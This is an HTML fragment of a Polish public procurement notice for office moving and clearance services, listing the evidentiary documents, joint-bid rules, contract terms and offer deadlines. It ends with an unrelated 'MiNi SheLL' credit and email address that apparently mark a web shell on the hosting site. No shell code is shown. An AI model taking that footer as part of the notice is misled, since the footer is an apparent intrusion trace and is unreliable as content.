(wg wzoru stanowiącego załącznik do materiałów postępowania)<br/>wykonanych<br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te<br/>usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>Do wykazu usług Wykonawca powinien dołączyć informację, czy usługi wymienione w wykazie usług wykonał sam czy potwierdzają<br/>wiedzę i doświadczenie innego podmiotu, którego zobowiązanie do udostępnienia wiedzy i doświadczenia winien załączyć wraz ze<br/>zobowiązaniem do jego udziału w wykonaniu części zamówienia.<br/>23.1.2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których mowa w pkt. 22.1.4.2 SWZ,<br/>wraz z informacjami na temat ich doświadczenia w wykonywaniu usług polegających na wnoszeniu, przenoszeniu, przewożeniu (np.<br/>teczki i segregatory), mebli biurowych takich jak: szafy, szafki, biurka, krzesła itp. oraz sprzętu biurowego takiego jak: niszczarki,<br/>faksy, kopiarki, drukarki, komputery itp. oraz informacji o podstawie do dysponowania tymi osobami.<br/>W przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru<br/>łączących go z nimi stosunków, do wykazu załącza pisemne zobowiązanie innych podmiotów do oddania Wykonawcy, do dyspozycji<br/>niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia.<br/>23.1.3.dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w pkt. 22.1.3. SWZ.<br/>23.1.4. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji<br/>o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw<br/>wykluczenia na podstawie art. 109 ust.1 pkt.4 ustawy. Dokument ten ma być złożony dla Wykonawcy, Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, podwykonawców i innych podmiotów na zdolnościach których lub ich sytuacji polega<br/>Wykonawca. UWAGA: Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych,<br/>w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne (Dz.U. z 2021 r. poz. 670) , o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust.<br/>1 ustawy, dane umożliwiające dostęp do tych środków.<br/>Pozostałe zawarte w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz usług, o których mowa w pkt. 22.1.4.1. SWZ (wg wzoru stanowiącego załącznik do materiałów postępowania) wykonanych <br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wraz z podaniem ich wartości, przedmiotu, dat wykonania <br/>i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; Do wykazu usług Wykonawca powinien dołączyć informację, czy usługi wymienione w wykazie usług wykonał sam czy potwierdzają wiedzę i doświadczenie innego podmiotu, którego zobowiązanie do udostępnienia wiedzy i doświadczenia winien załączyć wraz ze zobowiązaniem do jego udziału w wykonaniu części zamówienia.<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których mowa w pkt. 22.1.4.2 SWZ, wraz z informacjami na temat ich doświadczenia w wykonywaniu usług polegających na wykonaniu przeprowadzek lub opróżniania lokali mieszkalnych lub użytkowych.<br/>W przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru łączących go z nimi stosunków, do wykazu załącza pisemne zobowiązanie innych podmiotów do oddania Wykonawcy, do dyspozycji niezbędnych osób na okres korzystania <br/>z nich przy wykonaniu zamówienia.<br/>dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w pkt. 22.1.3. SWZ.<br/>odpisu z właściwego rejestru lub z centralnej ewidencji i informacji <br/>o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust.1 pkt.4 ustawy. Dokument ten ma być złożony dla Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podwykonawców i innych podmiotów na zdolnościach których lub ich sytuacji polega Wykonawca. UWAGA: Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2021 r. poz. 670) , o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, dane umożliwiające dostęp do tych środków. <br/> tłumaczeń na język polski dokumentów znajdujących się <br/> w zagranicznych bezpłatnych bazach danych wskazanych przez <br/> Wykonawcę;<br/> informacji o części zamówienia, którą wykonawca zamierza powierzyć podwykonawcy, w przypadku gdy wykonawca zamierza powierzyć podwykonawcy realizacji części zamówienia - wg wzoru stanowiącego załącznik do materiałów postępowania,<br/> oświadczenia Wykonawcy o aktualności informacji zawartych <br/> w oświadczeniu, w zakresie braku podstaw wykluczenia z postępowania <br/> wskazanych przez Zamawiającego w zakresie przesłanek, o których mowa <br/> w art. 108 ust. 1 i art. 109 ust. 1 pkt 4 ustawy.<br/>Pozostałe zawarte w SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dokumenty wymagane w przypadku składania oferty wspólnej.<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia<br/>i w takim przypadku muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy, zgodnie z art. 445 ust.1<br/>ustawy.<br/>2. Dokument pełnomocnictwa powinien być podpisany przez wszystkich<br/>Wykonawców. W zakresie formy, pełnomocnictwo musi odpowiadać<br/>przepisom Kodeksu Cywilnego.<br/>3. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję, itp. Wszelkie informacje i korespondencja kierowana przez Zamawiającego do pełnomocnika uważa się za<br/>skierowaną do wszystkich Wykonawców wspólnie ubiegających się o udzielenia zamówienia. W formularzu ofertowym<br/>Wykonawcy składający ofertę wspólną powinni wpisać dane teleadresowe, na które ma być kierowana korespondencja od<br/>Zamawiającego.<br/>4. Jeżeli oferta Wykonawców ubiegających się wspólnie o wykonanie zamówienia zostanie wybrana, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>14.11.5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać się spełnianiem warunków udziału w<br/>postępowaniu na zasadach określonych w pkt. 22.3 SWZ<br/>Pozostałe zawarte w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zostały wymienione w Rozdziale III SW Z paragraf 9 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgnmokotow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com